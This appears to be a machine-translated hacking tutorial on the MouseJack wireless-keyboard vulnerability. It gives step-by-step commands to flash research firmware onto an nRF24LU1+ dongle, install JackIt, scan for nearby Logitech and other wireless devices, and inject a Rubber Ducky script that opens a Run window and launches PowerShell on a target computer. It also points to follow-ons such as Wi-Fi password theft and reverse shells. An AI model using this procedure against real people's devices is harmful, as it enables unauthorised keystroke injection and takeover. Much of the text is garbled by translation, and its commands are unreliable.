MouseJack vulnerabilities were reported more than three years ago. Some manufacturers of wireless keyboards have since released firmware updates, but millions (if not billions) of keyboards worldwide are not patched, either because they can not be updated or because the manufacturer has never bothered to release one.
According to Bastille, "MouseJack is a vulnerability class that affects the vast majority of wireless keyboards and mice without Bluetooth." Under the direction of Marc Newlin, MouseJack uses the readiness of a USB dongle (see below), unencrypted keystrokes from to accept surrounding devices.
Step 1: Flashing the firmware
~ $ apt-get update
Multiple dependencies are required to run the Python scripts used to build and automate the Flash Processes are used. Use the following command apt-get to make sure that Git, Python, and other required packages are installed and up-to-date.
~ $ apt-get install sdcc binutils python python-pip git Read package lists ... Done Create dependency tree Status information is read ... Done python is already the latest version (2.7.16-1). python-pip is already the latest version (18.1-5). The following packages were automatically installed and are no longer needed: libpython3.6-minimal libpython3.6-stdlib python3.6 python3.6-minimal Use & sudo apt autoremove & # 39; to remove it. The following additional packages will be installed: binutils-common binutils-x86-64-linux-gnu gputils gputils-common gputils-doc libbinutils sdcc-doc sdcc-library Suggested packages: binutils-doc sdcc-ucsim The following NEW packages will be installed: gputils gputils-common gputils-doc sdcc sdcc-doc sdcc libraries The following packages are being updated: binutils binutils-common binutils-x86-64-linux-gnu libbinutils 4 updated, 6 reinstalled, 0 removed and 108 not updated. Requires 9,868 kB of archives. After this process, 63.7 MB of additional space will be used. Would you like to continue? [Y/n]
The version of PIP available in the Kali repository may be outdated. Update it with the following command.
~ $ pip install --upgrade pip Collect pip Download from https://files.pythonhosted.org/packages/f9/fb/863012b13912709c13cf5cfdbfb304fa6c727659d6290438e1a88df9d848/pip-19.1-py2.py3-none-any.whl (1.4 MB) 100% | ████████████████████████████████ | 1.4 MB 114 kB / s Install collected packages: pip Found existing installation: pip 18.1 Uninstallation of pip under /usr/lib/python2.7/dist-packages, outside environment / usr not possible Can & # 39; pip & # 39; do not uninstall. No files to uninstall found. Successfully installed pip-19.1
Further dependencies must be installed with PIP. Use the option -I when installing the PyUSB package, a Python USB access module.
~ $ pip install --upgrade -I pyusb REDUCTION: Python 2.7 will reach the end of its lifespan on January 1, 2020. Please update your Python as Python 2.7 will not be serviced after this date. A future version of pip will discontinue support for Python 2.7. Collect pyusb Download from https://files.pythonhosted.org/packages/5f/34/2095e821c01225377dda4ebdbd53d8316d6abb243c9bee43d3888fa91dd6/pyusb-1.0.2.tar.gz (54kB) | ████████████████████████████████ | 61 kB 82 kB / s Building wheels for collective packaging: Pyusb Building wheel for pyusb (setup.py) ... done Filed in directory: /root/.cache/pip/wheels/1f/a9/7e/d189b5030ee3a56f9b72c28281bb11d661b8ea312e28de08a5 Pyusb successfully built Install collected packages: pyusb Successfully Installed pyusb 1.0.2
Finally, install the latest PlatformIO package, an open source ecosystem for IoT development.
~ $ pip install - upgrade platformio Collect platform Download from https://files.pythonhosted.org/packages/fe/01/69aa7d8ef8cd74493338396ff86dc1bbfe85ae58b77fc705924c920a38eb/platformio-3.6.7-py27-none-any.whl (161kB) | ████████████████████████████████ | 163 kB 92 kB / s Collect Pyserial! = 3.3, <4,> = 3 (by platformio) Download from https://files.pythonhosted.org/packages/0d/e4/2a744dd9e3be04a0c0907414e2a01a7c88bb3915cbe3c8cc06e209f59c30/pyserial-3.4-py2.py3-none-any.whl (193kB) | ████████████████████████████████ | 194 kB 179 kB / s Requirement already met, upgrade will be skipped: Requirements <3,> = 2.4.0 in /usr/lib/python2.7/dist-packages (by platformio) (2.21.0) Collective click <6,> = 5 (by platformio) Download from https://files.pythonhosted.org/packages/8f/98/14966b6d772fd5fba1eb3bb34a62a7f736d609572493397cdc5715c14514/click-5.1-py2.py3-none-any.whl (65kB) | ████████████████████████████████ | 71 kB 188 kB / s Prerequisite already met, upgrade skipped: colorama in /usr/lib/python2.7/dist-packages (by platformio) (0.3.7) Collection bottle <0.13 (from platform) Download from https://files.pythonhosted.org/packages/32/4e/ed046324d5ec980c252987c1dca191e001b9f06ceffaebf037eef469937c/bottle-0.12.16.tar.gz (72kB) | ████████████████████████████████ | 81 kB 153 kB / s Collecting the semantics version <3,> = 2.5.0 (from platformio) Download from https://files.pythonhosted.org/packages/72/83/f76958017f3094b072d8e3a72d25c3ed65f754cc607fdb6a7b33d84ab1d5/semantic_version-2.6.0.tar.gz Building wheels for bulk packaging: bottle, semantic version Baurad for bottle (setup.py) ... finished Filed in: /root/.cache/pip/wheels/0c/68/ac/1546dcb27101ca6c4e50c5b5da92dbd3307f07cda5d88e81c7 Building wheel for semantic version (setup.py) ... done Saved in the directory: /root/.cache/pip/wheels/60/bb/50/215d669d31f992767f5dd8d3c974e79261707ee7f898f0dc10 Successfully built bottle semantics version Install collected packages: pyserial, click, bottle, semantic-version, platformio Existing installation found: Click 7.0 Uninstalling Click-7.0: Click-7.0 successfully uninstalled Bottle-0.12.16 click-5.1 platform-3.6.7 pyserial-3.4 semantic-version-2.6.0
Step 2: Clone the MouseJack repository
~ $ git clone https://github.com/BastilleResearch/mousejack/opt/mousejack Cloning in & # 39; / opt / mousejack & # 39; ... remote: List objects: 285, done. Remote: Total 285 (Delta 0), reused 0 (Delta 0), pack-reused 285 Receive objects: 100% (285/285), 8.63 MiB | 353.00 KiB / s, done. Deltas resolve: 100% (131/131), done.
Change to the new mousejack / directory.
~ $ cd / opt / mousejack /
Use the submodule init options to initialize the local configuration file for the nrf-research-firmware . This is the firmware that is flashed to the nRF24LU1 + device.
/ opt / mousejack $ git submodule init Submodule # research-firmware & # 39; (https://github.com/BastilleResearch/nrf-research-firmware.git) registered for path #rnr-research-firmware & # 39;
Then use Submodule Update . Options to retrieve all data and check out the corresponding commit list.
/ opt / mousejack $ git submodule update Cloning in & # 39; / opt / mousejack / nrf-research-firmware & # 39; ... Submodule_path #rf-research-firmware #: checked out # 02b84d1c4e59c0fb98263c83b2e7c7f9863a3b93 & # 39;
Change to the directory & # 39; nrf-research-firmware / & # 39 ;.
/ opt / mousejack $ cd nrf-research-firmware /  make Command to execute the commands in the Makefile.
/ nrf-research-firmware $ make mkdir -p am sdcc - model-large --std-c99 -c src / main.c -o bin / main.rel sdcc - model-large --std-c99 -c src / usb.c -o bin / usb.rel sdcc - model-large --std-c99 -c src / usb_desc.c -o bin / usb_desc.rel sdcc --model-large --std-c99 -c src / radio.c -o bin / radio.rel sdcc --xram-loc 0x8000 --xram-size 2048 - model-large bin / main.rel bin / usb.rel bin / usb_desc.rel bin / radio.rel -o bin / dongle.ihx objcopy -I ihex bin / dongle.ihx -O bin / dongle.bin objcopy --pad-to 26622 --gap-fill 255 -I ihex bin / dongle.ihx -O bin / dongle.formatted.bin objcopy -I binary bin / dongle.formatted.bin -O ihex bin / dongle.formatted.ihx
At this point, the device nRF24LU1 + should be inserted into the computer. Then execute the command make install .
/ nrf-research-firmware $ make install ./prog/usb-flasher/usb-flash.py bin / dongle.bin [2019-04-25 23:55:44.351] Looking for a compatible device that can jump to the Nordic bootloader [2019-04-25 23:55:44.378] Found device that jumps to the Nordic bootloader [2019-04-25 23:55:44.969] Looking for a device with the Nordic bootloader [2019-04-25 23:55:45.171] Write a picture in the flash [2019-04-25 23:55:45.808] Write review [2019-04-25 23:55:45.867] Firmware Programming completed successfully [2019-04-25 23:55:45.867] Please unplug your dongle or breakout board and plug it back in.
Disconnect the nRF24LU1 + from the computer as instructed. To check if the firmware has been flashed, reconnect the nRF24LU1 + device to the computer and use the command dmesg . The product and production lines should be "Research Firmware" or "RFStorm".
/ nrf-research-firmware $ dmesg [ 2433.986481] USB 2-1: New full speed USB device number 3 with xhci_hcd [ 2434.136930] USB 2-1: New USB device found, idVendor = 1915, idProduct = 0102, bcdDevice = 0.01 [ 2434.136938] USB 2-1: New USB Device Strings: Mfr = 1, Product = 2, SerialNumber = 0 [ 2434.136942] usb 2-1: Product: Research Firmware [ 2434.136946] usb 2-1: Developer: RFStorm
Step 3: Cloning the JackIt Repository
Now that the nRF24LU1 + device is set up, you can now search the environment for wireless mice and keyboards. The MouseJack repository contains several great Python scripts. Instead, we use the JackIt script to automate keyboard input.
JackIt was developed by phikshun and infamy and is an automation tool for using USB Rubber Ducky scripts
First, download the JackIt repository.
~ $ git clone https://github.com/insecurityofthings/jackit.git/opt/ jackit Cloning in & # 39; / opt / jackit & # 39; ... remote: listing objects: 718, done. Remote: Total 718 (Delta 0), reused 0 (Delta 0), pack-reused 718 Receive objects: 100% (718/718), 171.39 KiB | 153.00 KiB / s, done. Resolve deltas: 100% (439/439), done.
Change to the new directory jackit /.
~ $ cd / opt / jackit /
List the contents of the directory.
/ opt / jackit $ ls -la a total of 48 drwxr-xr-x 6 root root 4096 April 26 22:25. drwxr-xr-x 6 root root 4096 Apr 26 22:25 .. drwxr-xr-x 2 root root 4096 Apr 26 22:25 am drwxr-xr-x 2 root root 4096 April 26 22:25 Examples drwxr-xr-x 8 root root 4096 Apr 26 22:25 .git -rw-r - r-- 1 root root 1072 April 26 22:25 .gitignore drwxr-xr-x 5 root root 4096 April 26 22:25 jackit -rw-r - r-- 1 root root 4743 April 26 22:25 README.md -rw-r - r-- 1 root root 52 April 26 22:25 requirements.txt -rwxr-xr -x 1 root root 594 Apr 26 22:25 setup.py -rw-r - r-- 1 root root 289 26 Apr 22:25 tox.ini
We find a "requirements.txt" file. This indicates that multiple dependencies should be installed with PIP. That's it for the setup.
/ opt / jackit $ pip install -e. Get file: /// opt / jackit Prerequisite already fulfilled: Click == 5.1 in /usr/local/lib/python2.7/dist-packages (from JackIt == 0.1.0) (5.1) Collect Pyusb == 1.0.0 (from JackIt == 0.1.0) Download from https://files.pythonhosted.org/packages/8a/19/66fb48a4905e472f5dfeda3a1bafac369fbf6d6fc5cf55b780864962652d/PyUSB-1.0.0.tar.gz (52kB) | ████████████████████████████████ | 61 kB 81 kB / s Collecting six == 1.10.0 (from JackIt == 0.1.0) Download from https://files.pythonhosted.org/packages/c8/0a/b6723e1bc4c516cb687841499455a8505b44607ab535be01091c0f24f079/six-1.10.0-py2.py3-none-any.whl Collection table == 0.7.5 (by JackIt == 0.1.0) Download from https://files.pythonhosted.org/packages/db/40/6ffc855c365769c454591ac30a25e9ea0b3e8c952a1259141f5b9878bd3d/tabulate-0.7.5.tar.gz Building wheels for collected packages: Pyusb, tabular Building wheel for pyusb (setup.py) ... done Filed in directory: /root/.cache/pip/wheels/a6/69/c7/258e736ee9bdb4553bd9701424b259436b979cf96201af612f Build tabulate (setup.py) ... done Filed in: /root/.cache/pip/wheels/96/9c/9a/369b6376b11523584a6040a89488c28f0f88cb52167dceb648 Successfully created pyusb tabulate Install collected packages: pyusb, six, tabulate, JackIt Found available installation: pyusb 1.0.2 Uninstall Pyusb-1.0.2: Pyusb 1.0.2 successfully uninstalled Found existing installation: six 1.12.0 Uninstall Six-1.12.0: Six-1.12.0 successfully uninstalled Running setup.py for JackIt develop Successfully installed JackIt pyusb-1.0.0 six-1.10.0 tabulate-0.7.5
Browse the environment for vulnerable devices by simply jackit in any terminal.
~ Jackit ____. __ .___ __ | | ____ ____ | | _ | | / | _ | __ _ / ___ | | / / __ / __ | | / __ \ ___ | <| || | ________(____ /___ > __ | _ ___ || __ | / / / JackIt version 1.00 Created by Phikshun, shame [!] You must specify a ducky script with --script.
[!] Attacks are disabled. [+] Scan is started ... [+] Scan CTRL-C every 5 seconds when done. IMPORTANT ADDRESS CHANNELS COUNT THE PACKAGE SEEN ----- -------------- -------------------- ------- ---- ------- ------------ --------------------------- - 1 C7: D4: 21: 98: 07 74 3 Before 0:00:07 am Logitech HID 00: C2: 00: 00: 03: 10: 00: 00: 00: 2B
JackIt continuously scans the area for wireless Connections mice and keyboards. A vulnerable device identifies its address (serial number), channel, and type in the terminal. This information can be used for a targeted attack. For example, with the following payload of USB Rubber Ducky, you can open a run window and insert keystrokes into the target computer.
GUI r DELAY 1000 STRING Powershell
To use the USB Rubber Ducky script with JackIt, use the following command.
~ $ jackit --reset --address C7: D4: 21: 98: 07 - vendor Logitech --script / path / to /ducky/script.txt[19659014lightboxesPress Ctrl + c to stop the scan. JackIt asks to which address the keys should be pressed. This is a targeted attack so only one serial number is displayed in the scan. Press 1 and then Enter .
[+] Sniffing for C7: D4: 21: 98: 07 every 5s CTRL-C when you're ready. IMPORTANT ADDRESS CHANNELS COUNT THE PACKAGE SEEN ----- -------------- ---------- ------- ----------- --- --------- ----------------------------- 1 C7: D4: 21: 98: 07 2 1 0:00:10 before Logitech HID 00: C2: 00: 00: 00: 00: 00: 00: 00: 00: 00 ^ C [+] Select the destination keys (1-1) with commas or & # 39; all & # 39; separated from: [all]: 1 [+] Ping Success on Channel 65 [+] Sending an Attack on Channel 65 at C7: D4: 21: 98: 07 [Logitech HID] [+] All Attacks Complete
When the keystrokes are entered, the device executes the following commands:
The Ducky script opens the Run window and gives the following text. More complex PowerShell attacks can include filtering out Wi-Fi passwords, streaming the Windows 10 desktop, and Powercat reverse shells with payload hosted on Microsoft servers. Since Marc and Bastille released the MouseJack white paper in 2016, some manufacturers have released firmware updates for products that do not use a single-programmable memory (PROM). Most vulnerable USB dongles can not be patched due to hardware limitations. This does not apply to Logitech devices that need to be patched manually. Other manufacturers have pushed firmware updates and continue to use an unknown number of vulnerable products worldwide.
Thank you for reading! If you have any questions, you can leave a comment here or send me a message on Twitter @tokyoneon_ .